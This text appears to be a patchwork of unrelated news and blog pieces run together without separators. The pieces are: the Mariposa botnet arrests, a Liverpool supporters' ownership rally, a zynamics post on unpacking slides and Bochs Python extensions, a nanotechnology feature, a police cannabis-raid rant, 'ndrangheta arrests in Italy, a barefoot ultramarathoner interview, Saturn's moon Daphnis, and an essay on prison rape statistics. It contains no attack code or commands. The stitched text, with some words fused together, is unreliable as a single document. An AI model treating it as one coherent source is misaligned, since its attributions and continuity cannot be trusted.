" To use an analogy here , as opposed to arresting the guy who broke into your home , we 've arrested the guy that gave him the crowbar , the map and the best houses in the neighbourhood , " Jeffrey Troy , deputy assistant director for the FBI cyber division told Associated Press .
Botnet background
Botnets are networks of computers with malicious software installed .
This puts them under the control of cyber criminals without the knowledge of individual owners .
They can send spam e-mail from the host 's machine or search for information such as credit card details and send them back to their creator .
They also send replica programmes to other computers , sometimes via the e-mail of the host .
Security expert Rik Ferguson told the BBC that the mariposa botnet had got out of control .
" They guys behind it said it was more successful than they had intended to be , " he said .
" As is the case with most botnets , the more widespread they are the more likely they are to be discovered .
They were a victim of their own success . "
Mr Ferguson , senior security adviser at Trend Micro , added that while it was not unusual for a botnet to infect hundreds of thousands of computers , one infecting several million was rare .
Nobody has yet been arrested in connection with the Conficker worm , a similar virus which is currently running on 6 million Windows PCs and is believed to peaked at up to 12 million , he said .
While the core group behind a particular botnet is generally quite small , there is a whole industry of people offering " cyber crime services " such as tool kit building and program writing , he added .
Get the Echo newsletter - it has never been more important to stay informed Sign me up now Thank you for subscribing
We have more newsletters
Show me See our privacy notice Invalid Email
LIVERPOOL supporters marked American Independence Day by launching their own campaign for independence from the club ’s US owners .
Spirit of Shankly , who organised yesterday ’s event outside St George ’s Hall , said they were delighted with the turn - out .
An estimated 2,000 people gathered at St George ’s Plateau to hear a range of musicians , entertainers and speakers , including comedian John Bishop , actor Neil Fitzmaurice , and LFC legends John Aldridge and Howard Gayle .
One of the biggest cheers of the afternoon was saved for Bill Shankly ’s granddaughter Karen Gill , who travelled from Greece especially for the occasion .
She was clearly overcome with emotion when the crowd began chanting his name .
Ms Gill referred to the previous occasions when her grandfather stood on the same steps and made one of his legendary speeches , about Chairman Mao never having seen such a show of red strength .
She said : “ Whether it ’s a success or failure we support our team and my grandad recognised this .
“ He would have been proud to have seen such a show of red strength today . ”
The main aim of the rally was to hear about the launch of a supporter ownership scheme through the setting up of a credit union .
Leaders of the Spirit of Shankly group called on supporters to reclaim the club by joining the credit union , which it is hoped will be fully up and running by August .
Unlike previous attempts for fans to buy a stake in the club , organisers said the aim was to make it accessible for all , regardless of how much they can afford .
Spirit of Shankly has been in discussions with Share Liverpool who , in 2008 , launched a proposal for 100,000 fans to buy a share for £ 5,000 to raise the £ 500 m necessary to purchase the club .
Over the past 24 months , that figure has been reduced to make the idea more affordable to every day supporters .
It has been suggested for supporters to pool their financial resources together to raise enough cash for a share , or even pay by installments .
Spirit of Shankly committee member Paul Rice said : “ It ’s not just about making a noise and feeling better , it ’s about making a difference .
We want to represent the average supporter in the street . ”
Mr Rice said the immediate aim of the supporters ’ credit union was to own a 10 % stake in the club .
Among the Liverpool musicians entertaining the crowd were Ian McNabb , John Power . , Pete Wylie and Peter Hooton .
Speaking before his performance , Peter Hooton said : “ We know the club is in trouble , but it will get better as long as people put the effort in .
This turn - out exceeded all our expectations . ”
Pete Wylie said : “ This matters a lot to me .
Money has become all important , but this is a way for supporters to take back power . ”
A few days ago Jose and Ero presented in ReCon some of the latest ideas they have been working on regarding unpacking .
We have put our slides up for your viewing pleasure here :
[ slideshare id=4757587&doc=recon2010-100714205302-phpapp01 ]
Our slides are also available for download here .
Beware that they are merely a visual aid to our live presentation .
We will try to remember to announce when the ReCon video comes out so you can follow them there .
In addition , Jose will be presenting on the topic in SysCan Taipei on August 20th .
That will be another good chance to catch the info fresh and live .
Bochs and Python
Bochs and our custom Python extensions were one of the fundamental tools onto which we built our research .
Ero has been keeping the Python extensions up to date for a few years and they are something we use a lot at zynamics .
We have attempted to make them public in a few occasions ( an old patch is available in the Bochs mailing list ) but those attempts failed to make them known to more users .
We are frequently reminded at conferences that people would love to play with them , so this time we are making them available through a zynamics GitHub project .
The plan is to keep them in sync with all major releases of Bochs .
In the GitHub page you can find basic instructions on how to get them working .
The patch to apply to the current public version of Bochs ( 2.4.5 at this time ) can be found here
We will add usage examples to the GitHub wiki as time allows .
Also if there are special requests we will try to provide exemples on how to use the extensions for those cases .
Download them , play with them and let us know your thoughts .
Tags : bochs , conference , python , slides , tool , unpacking
Nanotechnology .
You ’re probably familiar with its promise in the form of the Star Trek replicator .
You want a glass of white wine and Chicken Cordon Bleu ?
Punch the keys on the microwave - like replicator and seconds later you ’ll be drinking a glass of Pinot Gris and digging into a plate of steaming hot chicken .
The Star Trek replicator creates molecules from subatomic particles and arranges those molecules to form a requested object .
Hungry ?
The replicator first forms atoms of carbon , hydrogen , nitrogen –- arranges them into amino acids , proteins , and cells –- and puts them all together as your wine and chicken .
This is the 22nd Century Star Trek vision of nanotechnology – creating molecules and objects from quarks , photons , and neutrinos .
The near - future 21st Century vision of nanotechnology –- detailed in Dr. K. Eric Drexler ’s seminal book Engines of Creation and elaborated in a nanotechnology roadmap –- has us assembling molecules using tiny , nanoscale robots with on board molecular computers .
" If we rearrange the atoms in coal we can make diamond , ” explains nanopioneer Dr. Ralph Merkle .
“ If we rearrange the atoms in sand ( and add a few other trace elements ) we can make computer chips .
If we rearrange the atoms in dirt , water and air we can make potatoes . "
Molecular Manufacturing
Such is the vision of nanotechnology – like the Mr. Fusion unit on the DeLorean time machine in the movie series Back to the Future , you can imagine dropping a banana peel into your Mr. Nano unit instead .
Rather than the 1.5 GW of power required to power Dr. Emmett Brown ’s time machine , you get Chicken Cordon Bleu ( or a bag of potato chips if you prefer ) .
A promising method of molecular manufacturing first theorized by Drexler and later tested by Merkle and collaborator Rob Freitas is diamondoid mechanosynthesis .
This is the mechanical synthesis of stable chemical structures using covalently bonded carbon –- otherwise known as diamond .
This manufacturing technology would build macroscale products atom - by - atom using bottom - up assembly , in contrast to the top - down assembly that represents almost all present - day manufacturing .
Or imagine targeted anti-aging therapy and drug delivery .
Nanoscale machines in the bloodstream can be used to target and repair cancer cells and other pathologies .
Rob Freitas has written extensively on the medical applications of molecular nanotechnology and medical nanorobotics .
Another promising molecular - level manufacturing technology that can also be used for targeted drug delivery is found in Paul Rothemund ’s work folding stringy DNA molecules into tiny , two - dimensional patterns known as DNA origami .
See Swan in a Box .
Like diamondoid mechanosynthesis , DNA origami is a bottom - up fabrication technique that exploits the intrinsic properties of atoms and molecules to make simple nanostructures .
The pace of development toward these nanotech visions is accelerating .
Here ’s the mind - boggling list of recent nanotech developments .
“ Utility fog ” is a term suggested by Dr. John Storrs Hall to describe a hypothetical collection of nanorobots together performing a certain function .
This is one of the more radical visions of nanotechnology manufacturing and a source for several SF novels – a cloud of microscopic robots with on board computers and arms reaching in several different directions that could perform 3D lattice reconfiguration and build , say … a chair .
Or a car .
How will engineers build the nanoscale robots for the molecular assembly lines of the future ?
Carbon nanotubes are essentially molecular cylinders of graphitic carbon that can be used to fabricate nanoscale devices by providing molecular probes , pipes , wires , bearings and springs –- the components needed to build nanoscale machines like those envisioned by Drexler , Hall , and others .
The pace of development toward these nanotech visions is accelerating .
During May 2009 alone , advances involving DNA and RNA molecules show the promise of integrating nanotechnology with carbon nanotubes and nanoparticle metals ( sized between 1 and 100 nanometers ) to bootstrap precise control structures .
Here ’s the mind - boggling list of recent nanotech developments :
• DNA wrapped carbon nanotubes for artificial tissue
• Two ways to make large scale three dimensional structures out of DNA
1. Routing a single - stranded scaffold DNA ( a virus genome ) through every section of a tube template
2. DNA used to assemble sheets of metal nanoparticles , that could be the basis of nanocircuits and could be integrated with the 3D nanotechnology
• Large scale 3D nanotechnology with DNA that is integrated with carbon nanotubes , diamond nanorods , nanoparticle metal , graphene and other DNA compatible chemistry
• DNA to detect pathogens and be used for drug delivery
• Modified RNA so that it reliably enter cells for drug delivery
• Ultrathin diamond nanorods – only twice as thick as the diamond rod logic for the molecular computers described by Drexler .
Given the level of extremely rapid discovery and experimentation , it seems like we may be reaching a tipping point – and it certainly supports the case for Kurzweil ’s Law of Accelerating Returns .
Foresight Institute
The Foresight Nanotechnology Institute is the leading think tank and public interest institute for nanotechnology .
Founded in 1986 , this institute was the first organization to provide outreach concerning the benefits and risks of nanotechnology .
The concept of nanotechnology is largely credited to a talk given by physicist Dr. Richard Feynman , a Nobel Prize winner in Physics , at an American Physical Society meeting at Caltech on December 29 , 1959 .
Feynman described a process to manipulate individual atoms and molecules .
The Foresight Institute established the Feynman Grand Prize in 1996 to motivate scientists and engineers to design and construct a functioning nanoscale robotic arm with specific performance characteristics .
This $ 250,000 incentive prize is somewhat analogous to the Loebner Prize for Artificial Intelligence ( AI ) – a Grail of sorts .
Either a human - level AI agent or a nanoscale robot arm will bring big changes .
The Foresight Institute is also helping to set the agenda for the beneficial applications of nanotechnology :
1. Providing Renewable Clean Energy
2. Supplying Clean Water Globally
3. Improving Health and Longevity
4. Healing and Preserving the Environment
5. Making Information Technology Available To All
6. Enabling Space Development .
Nanotechnology Roadmap
So how do we get there from here ?
Supported through grants to the Foresight Institute by the Waitt Family Foundation ( founding sponsor ) and Sun Microsystems , and with direct support from Nanorex , Zyvex Labs , and Synchrona , a distinguished multi-disciplinary group of scientists and engineers have created a 198 pp. nanotechnology roadmap .
The roadmap ’s executive summary describes a unique , cross- disciplinary process for exploring current capabilities and near - term opportunities in atomically precise technologies ( APT ) , and examines pathways leading toward advanced atomically precise manufacturing ( APM ) ..
The long - term vision is the fabrication of a wider range of materials and products with atomic precision .
However , there are strong differences of opinion on how rapidly this will occur .
All agree , however , that expanding the scope of atomic precision will dramatically improve high - performance technologies of all kinds , from medicine , sensors , and displays to materials and solar power .
If nanotechnology follows Moore ’s law ( transistors on a chip double every 18 months ) , this level of nanotechnology could occur in the next 15 years or less .
The vision includes :
• Precisely targeted agents for cancer therapy
• Efficient solar photovoltaic cells
• Efficient , high - power - density fuel cells
• Single molecule and single electron sensors
• Biomedical sensors ( in vitro and in vivo )
• High - density computer memory
• Molecular - scale computer circuits
• Selectively permeable membranes
• Highly selective catalysts
• Display and lighting systems
• Responsive ( “ smart ” ) materials
• Ultra-high - performance materials
• Nanosystems for APM .
The Roadmap identifies three successive development horizons – with timelines clearly dependent upon funding and R&D ( Table 1 ) .
Table 1 .
Projected nanotechnology applications for successive development horizons
So How Close Are We Really ?
Given such rapid recent technological progress , how close are we to achieving the vision of molecular nanotechnology in the roadmap ?
h+ Magazine asked this question of some of the pioneers who founded the science of nanotechnology : Drexler , Hall , Merkle , and Freitas …
K. Eric Drexler
K. Eric Drexler , Ph.D. , is a researcher and author whose work focuses on advanced nanotechnologies and directions for current research .
Drexler was awarded a Ph.D. from the Massachusetts Institute of Technology ( MIT ) in Molecular Nanotechnology ( the first degree of its kind ) .
Dr. Drexler serves as Chief Technical Advisor to Nanorex , a company developing open - source design software for structural DNA nanotechnologies .
To describe progress toward advanced nanotechnology , I ’d like to offer an analogy to spaceflight .
For decades , there was progress rocketry , but no spaceflight .
Rockets flew faster , higher , and further , yet there were no communications satellites , weather satellites , or astronauts .
Within five years of the first satellite launch , there were all three .
Today , there is rapid progress toward nanotechnologies at the level I described in Engines of Creation ( with updated objectives , of course ) , but there is a threshold ahead , like reaching orbit , that has n’t yet been achieved .
Although the world - changing technologies accessible at that level are still years in the future , there is a technology roadmap , and progress is accelerating .
J. Storrs Hall
" Josh " Hall is President of Foresight Institute , author of Nanofuture : What ’s Next for Nanotechnology , fellow of the Molecular Engineering Research Institute and Research Fellow of the Institute for Molecular Manufacturing .
Hall was also a computer systems architect at the Laboratory for Computer Science Research at Rutgers University from 1985 until 1997 .
His most recent book is Beyond AI : Creating the Conscience of the Machine .
There is certainly a lot of progress in the labs .
The DNA origami ( and 3D structures ) work is quite promising .
Give them a few years and they will be making circuits by having the DNA mats bind and position components and wires .
I ’d guess that by 2020 the self - assembly and top - down photo lithography approaches to building circuits will have merged .
The semiconductor industry roadmap calls for four nanometer gate lengths in 2022 , which is just about right …
The big roadblock that nobody ’s looking at is powered moving parts – nanomachines .
It ’s a toss - up as to when that will be hurdled , because it depends so much on how much effort is put into it .
The Foresight Institute is going to be concentrating on this in the coming years , to what effect we do n’t know .
My best guess is that the technology to win the Feynman Grand Prize ( that is , build a working robot arm at the nanoscale ) will come somewhere between 2020 to 2030 , depending on the level of effort .
Ralph Merkle
Dr. Merkle received his Ph.D. from Stanford University in 1979 where he co-invented public key cryptography .
He joined Xerox PARC in 1988 , where he pursued research in security and computational nanotechnology until 1999 .
He was a Nanotechnology Theorist at Zyvex until 2003 , when he joined the Georgia Institute of Technology as a Professor of Computing until 2006 .
He is now a Senior Research Fellow at the Institute for Molecular Manufacturing .
There ’s a lot of work on self assembly in general and DNA nanotechnology in particular – it ’s very exciting and advances the state of the art .
We can do things today at the molecular scale that we could n’t do even a few years ago .
I ’ve been working with ( Rob ) Freitas on mechanosynthesis , which is one of several routes to develop nanotechnology that is being explored .
We ’ve been collaborating with various people , including Professor Philip Moriarty of the Nanoscience Group in the School of Physics at the University of Nottingham , an experimentalist in England .
It might still be a few decades before we have the ability to inexpensively arrange atoms in most of the ways permitted by physical law , but progress has been remarkable — the exponential trends continue to be exponential , and there ’s every reason to think they will continue that way for some time .
Rob Freitas
Robert A. Freitas Jr. is Senior Research Fellow at the Institute for Molecular Manufacturing ( IMM ) in Palo Alto , California , and was a Research Scientist at Zyvex Corp. , the first molecular nanotechnology company , during 2000 – 2004 .
Freitas is the author of Nanomedicine , the first book - length technical discussion of the potential medical applications of molecular nanotechnology and medical nanorobotics .
I think the pace of nanotechnology development is slowly accelerating on all fronts .
Progress in DNA nanotech continues to quicken , increasing our ability to arrange organic matter by design at the molecular level .
Diamondoid MNT ( Molecular Nanotechnology ) also continues to make steady progress , both in terms of experimental and theoretical accomplishments , with the first focused experimental work on diamond mechanosynthesis finally underway since last October .
We are clearly moving closer to achieving the long - term vision of medical nanorobotics and MNT .
In Conclusion : The Coming Diamond Age
Surprisingly , a work of SF is a required textbook at MIT ’s Media Lab .
The Diamond Age by Neal Stephenson highlights the world of the relatively near future .
“ The Feed ” allows most anything to be created at any outlet ( think Star Trek replicators ) , creating a minimum standard of living for all mankind through the spread of nanotechnology .
Nanoscale clouds of mites ( think Utility Fog ) – engineered nanoprobes – fly about gathering information .
The mites can examine people from the inside and detect medical problems .
Mites , like viruses , can infect or inoculate people .
Stephenson ’s
The Diamond Age is , of course , based on diamondoid mechanosynthesis – the ability to assemble diamond structures form carbon atoms that Merkle and Freitas are actively researching today .
It ’s notable that both Drexler and Merkle are given honorable mention in this SF - textbook - blueprint for the 21st Century .
If we are to believe Drexler , Hall , Merkle , and Freitas and the nanotechnology roadmap – and the accelerating pace of nanotechnology development does appear to support them – we are on the cusp of a new era in the next 20 - 30 years .
Such an era would be akin in magnitude to the Information Age , the Industrial Age , the Iron Age , the Bronze Age , and the Stone Age .
Except this time , it ’s the Diamond Age .
Metropolitan police mistake diplomats home for cannabis factory
Once again the police terrorize innocent citizens in their search for the dreaded cannabis .
This time they raided the house of the Nigerian High Commissioner in Hendon .
Nice work lads .
Read the story here .
Unbelievable .
This is not the first time this has happened .
Let this be a warning though that the pigs in London really are actively looking for grow operations using thermal imaging gear in helicopters .
They ’re just not very good at it yet !
Talk about a waste of public money , I wonder how much it costs to keep one of those helicopters in the air for a day .
Disgusting .
ROME ( AP )  Anti-mafia prosecutors claimed a major victory over the powerful and growing ' ndrangheta crime syndicate , infiltrating intimate weddings , baptisms and other events to gather information that led to the arrests Tuesday of 305 people , including top bosses , and the seizure of more than $ 76 million in cash and property .
One of the most significant revelations to emerge from the investigation was that the Calabrian mob had a tight hierarchal structure like that of the Sicilian Mafia , and was n't just an association of clans as previously believed .
While expanding its economic reach into the wealthy Lombard region in northern Italy , the ' ndrangheta ( en - DRAN - geh - tah ) is also concentrating its power in its native Calabria , exerting tight control over all strategic decision - making , anti-mafia prosecutors said .
The operation began before dawn with the 4 a.m. arrest of Domenico Oppedisano , the crime group 's top boss , in the small coastal town of Rosarno in Calabria .
But the investigation owed its success to investigators ' ability to infiltrate events like the 2009 wedding of the children of two crime bosses in Calabria , attended by thousands of well - wishers , where Oppedisano was named to his post , said Calabrian anti-mafia prosecutor Giuseppe Pignatone .
When Oppedisano was formally elevated some two weeks later , on Sept. 2 , the feast of Madonna Polsi , undercover agents got video of the crime syndicate 's major bosses all being confirmed in their new positions in the structure , he said .
" Police and carabinieri have been able to record since Aug. 1 , 2009 all of the major negotiations of the various families , " Pignatone told a news conference .
That includes some 40 similar meetings in Lombardy , which has become the Calabrian mob 's moneymaking center , with operations focusing on excavations for construction sites , trash disposal and real estate .
While officials seized euro60 million in cash and property , prosecutors are unable to estimate how much the ' ndrangheta is cashing in each year .
Wiretaps indicate that as many as 500 ' ndrangheta mobsters are operating in Lombardy , where 160 were arrested .
They include Pino Neri , whom police said was in charge of the gang 's businesses in Milan , where the ' ndrangheta has been making major inroads .
The investigation revealed the ' ndrangheta was extremely " hierarchical , united and pyramidal , " and not just clan - based as previously believed , said Italy 's chief anti-mafia prosecutor Piero Grasso .
That became clear when the Lombard branch , empowered by its riches , attempted to exert autonomy and was cut short when the Calabrian bosses sent a professional killer to murder the would - be upstarts , Pignatone said .
The 'ndrangheta has emerged as one of the most powerful of the crime syndicates , even if only since February has Italian law recognized it as a criminal organization .
From Calabria , it has spread its tentacles to northern Italy , where it migrated in the 1970s and 1980s , to Germany , and as far away as Canada and Australia .
Investigators described the operation as one of the biggest blows ever to an organization that is now considered to be more powerful than the Sicilian Mafia .
The raids involved 3,000 police across the country and the charges against those arrested ranged from murder and extortion to arms and drug trafficking and criminal association .
The last big operation against the Calabrian mob dates to the 1990s .
Since then , the 'ndrangheta has expanded its power , mainly through its grip on drug trafficking .
But what Grasso said was particularly worrisome was the crime group 's infiltration into the economic arena , a form of mafia entrepreneurship , with the ability to get an inside track when contracts are handed out .
Among those arrested was the head of the state health system in the city of Pavia , south of Milan .
Prosecutors emphasized that wiretaps were a key to the ' ndrangheta investigation , but declined to speculate on how a proposed new bill that would limit the use of electronic eavesdropping might have affected their work .
Premier Silvio Berlusconi , who has been stung by some embarrassing disclosure in published transcripts of private conversations mostly unrelated to investigations , is pushing the measures through parliament .
While terrorism and mafia investigations are exempt from the proposed restrictions , magistrates complain that big probes often stem from low - level criminal cases .
Passage of the law , they say , will give criminals operating in Italy protection .
The restrictions include a strict time limit on wiretaps , which prosecutors say is insufficient , and a level of proof needed to obtain permission to launch the wiretaps that investigators charge is tantamount to evidence needed for a conviction .
" Today we violated the privacy of many ' ndranghetisti , " Grasso quipped .
Copyright 2010 The Associated Press .
All rights reserved .
This material may not be published , broadcast , rewritten or redistributed .
Guidelines :
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
Read more
We recently interviewed Ultra Marathoner and barefoot runner , Patrick Sweeney , who , in what may be the fastest marathon ever run in Vibram Five Fingers , recorded an awesome time of 2:37:14 winning the Palos Verdes Marathon .
He ran in Vibram Five Fingers Sprints .
How did you get into Ultra Marathons and barefoot running ?
I picked up Ultra running a few years ago and was hooked .
I had a really good rookie year in 2008 and had high hopes for 2009 only to be plagued with injury .
I decided something needed to change .
I gave up running shoes cold turkey .
I have been running in Vibram fivefingers or nothing at all .
My body has been getting stronger everyday .
Congratulations on your recent marathon victory at Palos Verdes .
It was very fast at 2:37:14 .
Do you know how it ranks among the fastest marathons ever run in Vibram Five Fingers ?
Thank You .
I have no freaking clue .
But the race came real easy , I would guess it ’s the fastest for now but I ’m sure some kid will beat it this summer .
Palos Verdes is a very hilly course for a marathon .
It ’s not a place where most people will P.R.
I think I could go about 10 minutes faster on a flat course like Long Beach which I will run in October , but by that time I may be running barefoot instead .
I bet we will see a sub 2:15 sometime in the next year , but definitely not by me .
You beat your personal best marathon time by 17 minutes .
What contributed to the dramatic improvement ?
A positive attitude .
I ’m excited not to be injured anymore .
My training is just starting to come together for the San Diego 100 miler .
I was just out there to have fun and I was smiling almost the whole entire race .
We read on your blog that you train mostly barefoot on sand .
Why is this and do you have any trouble adjusting to other surfaces and terrains in your races ?
I live near the beach in Southern California .
I pay lot of money in rent for this privilege , so I take advantage of it as much as possible .
10 to 15 mile barefoot soft sand runs are my bread butter .
I never run hills and almost every Ultra is in the mountains .
The soft sand prepares me well for climbing , but my quads suffer while running downhill for miles at a time .
I do really enjoy the way Vibram ’s let me feel the trail beneath my feet .
Do you mostly train barefoot , but run races in Vibram Five Fingers ?
I ’m Barefoot for about 80 to 90 percent of my training .
When a race nears I ’ll slip on the Vibram ’s a few times .
I wear my Treks if I go hiking and my normal KSOs for going out at night .
I have not worn a running shoe since Halloween .
You have the San Diego 100 mile race scheduled for June and are planning on wearing KSO Treks .
Why did you chose Treks for that race ?
Right now the Trek ’s are my best option .
I ran the Leona Divide 50 miler last month in a pair and they held up quite well .
I had no troubles at all on the technical parts of the trail .
My only complaint is that they do n’t breathe very well .
After the race I had no blisters but my feet looked like they had been soaking in water for the last 8 hours .
I do n’t think Vibram has made the perfect shoe as of yet , but they are on the right track .
Later in the summer you are pacing in the Badwater Ultra Marathon from Death Valley to Mt. Whitney , CA .
That sounds like a grueling race .
Is is hard to stay hydrated ?
I paced a double Badwater last year and had a great time .
Staying hydrated is super easy when you have a good crew .
Runners are pampered like you would n’t believe , but in these extreme conditions it is definitely needed .
Will you be wearing VFFs at Badwater ?
I ’ll be using my Sprints for the shoe melting asphalt , and my Treks for climbing Whitney .
I also plan on using my home made huaraches sandals .
As an ultra marathoner , you consider a marathon a short race .
What is your favorite distance ?
Marathons are quick fast races .
You know your not going to be out running all day , you need to start flying from the beginning and hope to hold on to the pace till the end .
I do n’t have a favorite distance but it is fun to see the sun rise and set during the same run .
How have Vibram Five Fingers been received by your fellow runners and friends ?
During P.V. last week I saw some other runners looking at my feet before the race .
I do n’t think they expected me to beat them .
During the race I saw a lot of people smiling when they saw my Sprints .
People were very enthusiastic about the Vibrams after the race as well .
The five fingers have gone mainstream and most people seemed to have already heard of them .
Many of my friends either already have a pair or plan to by them in the future .
Have you had any unusual experiences while wearing them ?
I play a lot of disc golf in my Five Fingers .
I plan of setting the world record of most holes played in a 24 hour span sometime this summer .
Somewhere around 1,000 holes and 100k worth of traversing .
I ’m toying with idea of devoting this whole next year of training towards running a sub 6 hour Comrades marathon in South Africa wearing Five Fingers .
I think I am currently over an hour away from that pace but I think I ’m up for the challenge .
Can you tell us about your blog name , “ Bourbon Feet – Testing the mind , body and liver ” ?
I enjoy experimenting with what I am capable of .
My Feet keep me strong and sipping Bourbon makes me happy .
Also , the domain name happyfeet was already taken .
How does drinking fit in with being an ultra marathon runner ?
Beer provides excellent calories for working out .
Some of my best runs have occurred when I left the house inebriated .
Every 4th of July I compete in the Hermosa Beach Iron Man .
It involves running one mile on the beach , paddling a surfboard one mile and then pounding a six pack of beer .
I ’ve got my drinking down to under four and half minutes .
This race has inspired me to put together my own event .
The plan is 10 beers , 10 taco ’s , ten miles .
One beer and one taco must be consumed before starting your next mile .
The goal is to finish in under 100 minutes .
Sometime in the next week I will do a shorter six beer , six taco , six mile training run with a few friends .
I would love to also run a 50 on nothing but beer .
( Vote on how far you think you would make it in Partrick ’s race in this weeks poll ! )
Follow Patrick Sweeney as he tests the extreme limits of human endurance on his blog at http://bourbonfeet.blogspot.com/.
Also , see his training log at the dailymile.com , where Patrick uses a Garmin 310XT and uploads all of his workouts there .
Thank you very much , Patrick .
A tiny moonorbiting Saturn has been caught creating ripples in the trademark ringsaround the gas giant planet in new photos from NASA 's Cassini spacecraft .
The newSaturn moon photos show Daphnis , a diminutive satellite just5 miles ( 8 km ) wide .
But Daphnis is still large enough that its gravitational pull candisruptnearby ring material as it circles Saturn .
Saturn 'srings are made of ice and dirt ranging in from small particles toboulders andcountless larger objects as big as houses and even small towns .
Therings ' total diameter is about 175,000 miles ( 282,000 km ) , butthey 're just overhalf a mile ( 1 km ) thick .
In the new photos , shallow scallopedwavespropagate along the edges of the Keeler Gap ?
a rift in Saturn 's outerA ringabout 26 miles wide ( 42 km ) that is home to Daphnis .
The waves have both vertical and horizontal components because the moonmovesin inclined orbit .
The newphotos are the closest ever captured of Daphnis , which was discoveredin 2005 .
Itorbits Saturn at a distance of about 84,820 miles ( 136,505 km ) from theplanet 's center .
[ Photosof Saturn moons ]
Daphnis wasthe second moon discovered to fly within the Saturn ' srings .
The first was Pan , which is 16 miles ( 25 km ) acrossand orbits inSaturn 's Encke Gap , another break in the planet 's ring system .
To date , astronomers have discovered more than 60 Saturn moons , though only 53 of themhave been named , according to a NASA database .
Shortly after the Enron scandal broke in 2001 , California Attorney General Bill Lockyer declared that he would love to personally escort the company 's CEO " to an eight - by - 10 cell that he could share with a tattooed dude who says , ' Hi , my name is Spike , honey . '? "
The negative reaction compelled Lockyer to offer a tepid apology in a letter to the Los Angeles Times , explaining that he had gotten carried away in righteous anger and pointing to the initiatives he had undertaken to curb prison rape .
The unusual thing about this incident was not that Lockyer made a crude joke about prison rape .
It 's that he caught flak for it .
While jokes about male - on - female rape are widely viewed as taboo in this feminist age , male - on - male rape in prison is a perfectly acceptable and common subject of humor on late - night comedy shows , in movies , and even in TV commercials .
The reality , of course , is considerably less funny .
It includes tragic cases such as that of Rodney Hulin , a 17 - year - old inmate who hanged himself with a sheet in 1996 after prison officials repeatedly ignored his complaints of rape and other sexual abuse .
Hulin 's parents collected a $ 215,000 settlement from the state of Texas three years later .
A few years ago , a coalition ranging from Amnesty International to Focus on the Family began a push for measures to curb prison rape .
In 2003 Congress held hearings on the issue and passed the Prison Rape Reduction Act , which directed state prison systems to collect statistics on sexual violence against inmates and to report on steps taken to reduce it .
The activists are up against a lot of social indifference .
As prison - rape humor demonstrates , there is a widespread lack of sympathy for the victims , who are , after all , convicted criminals — even though rape was n't a part of their sentence .
While you would have to scrape the bottom of the Internet to find people saying that the fear of sexual assault is a good deterrent to would - be lawbreakers , it is safe to say that prison rape is not a high priority for most American voters .
Yet even with the will to do something about it , prison rape may be uniquely difficult to address .
It 's a challenge even to get a reliable estimate of its prevalence .
Activists argue that rape in American prisons is an endemic problem , with as many as 200,000 or 300,000 rapes behind bars every year .
Other experts question those figures .
A review of the literature by Gerald G. Gaes of the Federal Bureau of Prisons and Andrew L. Goldberg of the National Institute of Justice , published by the latter agency in March 2004 , found that estimates of how many male inmates experience forced sex during incarceration range from nearly 10 percent to less than 1 percent .
In the Midwestern prison study that yielded the high - end estimate , by University of South Dakota psychologist Cindy Struckman - Johnson and her colleagues , the inmates were given questionnaires they could fill out and send back at their discretion .
Gaes and Goldberg point out that only about 25 percent of the survey forms were returned , raising the question of response bias : Prisoners who had been raped may have been more likely to return the questionnaire .
They also suggested that the method " raises suspicions about collusion " among prisoners .
By contrast , Case Western Reserve University cultural anthropologist Mark S. Fleisher , who was hired by the U.S. Justice Department in 2004 to do a comprehensive study of prison rape , found not a single inmate in more than 500 interviews who claimed he had been raped .
But Fleisher 's method of face - to - face interviews with prisoners , on a topic as sensitive as prison rape , does not seem ideally suited to elicit candor .
Fleisher 's study , " The Culture of Prison Sexual Violence " ( which has not been officially published by the Justice Department but is available on the website of the National Criminal Justice Reference Service ) , caused a flurry of controversy when preliminary reports of his findings were released in May 2006 .
Fleisher seemed to downplay the problem of sexual violence behind bars , asserting that the ubiquity of violent rape in prison is a media - perpetuated myth that bears little relation to reality .
In fact , he argues , inmates tend to see most of the sexual activity that occurs in prison as consensual .
Yet Fleisher 's own report gives little cause to endorse the inmates ' views .
In the prison culture , he notes , it is widely believed that " a man can not be raped unless he wants to be , " that a man who does not fight back against a sexual assault as forcefully as he can is in effect consenting to sex , and that it 's not rape if the victim is gay .
Sexual coercion without overt physical violence — through threats of force , offers of protection , and other exchange of favors — may not be seen as rape by many prisoners , but there 's no reason the rest of us should agree .
One of Fleisher 's own " nonraped " interviewees gives a matter - of - fact account of acceding to sexual demands from an inmate who had earlier taken him under his wing and whom he had seen as an older brother : " He said I could either do it or he'd take it .
So I bent over and let him do it to me . "
While such abuse may not be as dramatic as the stereotype of gang rape in the showers , that does n't make it acceptable .
Yet it would also be unwise to accept the activists ' claims at face value .
As we have learned from the examples of domestic violence , sexual assault on campus , and homelessness , advocacy groups are prone to the abuse of statistics — and to the use of unreliable narratives .
For instance , while the story of Rodney Hulin is a horrific one , the summaries in anti–prison rape advocacy literature omit a number of facts that do not fit the narrative of a teenager who finds himself in prison for a minor crime ( setting fire to a dumpster ) and is driven to suicide by sexual assaults after the authorities turn a deaf ear to his pleas .
A 1999 story in the Houston Press revealed that Hulin had a history of violence , mental illness , self - endangerment , bizarre sexual behavior , and apparently baseless claims of sexual abuse against his own father .
While it 's likely that he was indeed sexually assaulted in prison , it is also likely that the worst part of the prison authorities ' negligence was their decision to classify the teenager as psychologically sound without a proper evaluation , and to deny him the psychiatric care he clearly needed .
But there is no doubt that the response to Hulin 's complaints of sexual assault was shamefully inadequate :
No investigation was conducted even after a medical examination showed tears in his rectum , and a physician 's assistant blamed the injuries on constipation .
Hulin 's mother , Linda Bruntmeyer , says that her own complaint to the warden was brushed aside with a matter - of - fact statement that rapes in prison happen and her son needed to grow up .
In an email exchange , I asked Fleisher whether enough was being done to address the prison rape problem and what further steps could be taken .
His reply : " Correctional administrators are serious about all aspects of prison administration and management . "
This optimistic assessment is undermined by much evidence that correctional staff too often see sexual coercion as a part of the prison culture that inmates have to either accept or handle on their own .
Changing this culture will take more than federally mandated posters reminding inmates that sexual assault is a crime and urging them to break the code of silence .
At present , it is very difficult — virtually impossible in some states — for inmates who have been raped to collect damages from the prison system .
Guards who neglect or even condone inmate - on - inmate assaults run virtually no risk of punishment .
Other serious measures to combat prison rape would include both " conservative " solutions ( stricter prisoner supervision ) and " liberal " ones ( less overcrowding ) .
Even lower - end estimates given by correctional organizations suggest that 20,000 to 40,000 inmates are sexually assaulted in American prisons every year .
